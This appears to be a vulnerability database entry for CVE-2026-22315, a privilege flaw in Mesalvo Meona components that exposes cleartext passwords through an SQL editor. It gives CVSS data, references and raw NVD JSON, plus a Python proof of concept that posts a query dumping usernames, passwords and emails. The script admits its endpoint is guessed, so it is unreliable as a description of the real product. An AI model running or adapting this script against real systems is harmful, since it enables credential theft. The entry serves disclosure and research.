CVE-2026-22315

Description

Incorrect Privilege Assignment vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables the export of user data, including cleartext passwords, via the SQL editor. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Mesalvo Meona Client Launcher Component <= 19.06.2020 15:11:49

Mesalvo Meona Server Component <= 2025.04 5+323020

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-22315: Incorrect Privilege Assignment
# This script simulates exploiting the SQL editor to export user data.

import requests

def exploit_meona(target_url, session_cookie):
    """
    Exploits the incorrect privilege assignment to export user data via SQL editor.
    Note: Requires High Privileges (PR:H) as per vulnerability details.
    """
    headers = {
        "Cookie": f"session_id={session_cookie}",
        "Content-Type": "application/json"
    }
    
    # Endpoint for the SQL Editor (hypothetical based on description)
    sql_endpoint = f"{target_url}/api/sql-editor/execute"
    
    # Payload to dump user table with cleartext passwords
    payload = {
        "query": "SELECT username, password, email FROM users_table;",
        "output_format": "csv"
    }
    
    try:
        print(f"[*] Attempting to connect to {target_url}...")
        response = requests.post(sql_endpoint, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Sensitive data exported:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
            
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target and valid high-privilege session
    target = "https://vulnerable-meona-server.com"
    session = "high_priv_user_session_token_here"
    exploit_meona(target, session)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22315
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22315
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22315/
[4] VulDB https://vuldb.com/cve/CVE-2026-22315
[5] https://seccore.at/blog/cves-meona/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22315", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-20T11:16:26.187", "lastModified": "2026-05-20T14:03:10.193", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables the export  of user data, including cleartext passwords, via the SQL editor. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://seccore.at/blog/cves-meona/", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}